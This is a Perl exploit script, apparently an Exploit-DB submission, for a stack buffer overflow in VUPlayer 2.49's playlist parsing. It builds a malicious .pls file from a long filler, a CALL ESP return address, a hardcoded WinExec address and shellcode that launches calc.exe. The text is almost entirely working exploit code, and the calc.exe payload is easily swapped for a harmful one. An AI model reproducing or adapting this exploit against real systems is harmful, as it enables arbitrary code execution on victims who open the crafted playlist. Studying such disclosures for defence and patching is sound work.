#!/usr/bin/perl# Exploit Title: VUPlayer <= 2.49 Buffer Overflow Exploit in playlist# Date: 30/05/2013# Exploit Author: 0x00# Vendor Homepage: http://www.vuplayer.com/# Software Link: http://www.vuplayer.com/files/vuplayersetup.exe# Version: 2.49# Tested on: Windows Xp SP2 Spanish# In this version has discovered a buffer overflow vulnerability,# when executing play-list containing a "URL" which overflows the stack and allows us to execute code# in this case will be the windows calc.exe$buffer = "A"x1005; # Fill buffer$offset = "\x5D\x38\x82\x7C"; # CALL ESP$call_winexec = "\x4D\x11\x86\x7C"; # Offset de kernel32.WinExec# Run calc.exe$shellcode = "\x55\x8B\xEC\x32\xD2\x83\xEC\x10\xC6\x45\xF1\x63\xC6\x45\xF2\x61". "\xC6\x45\xF3\x6C\xC6\x45\xF4\x63\xC6\x45\xF5\x2E\xC6\x45\xF6\x65\xC6\x45". "\xF7\x78\xC6\x45\xF8\x65\x88\x55\xF9\x8D\x45\xF1\x33\xC9\xB1\x05\x51\x50\xBB" . $call_winexec . "\xFF\xD3"; $overflow = $buffer . $offset . $shellcode;open(FILE,"> BoF.pls");print FILE "http://".$overflow;close FILE;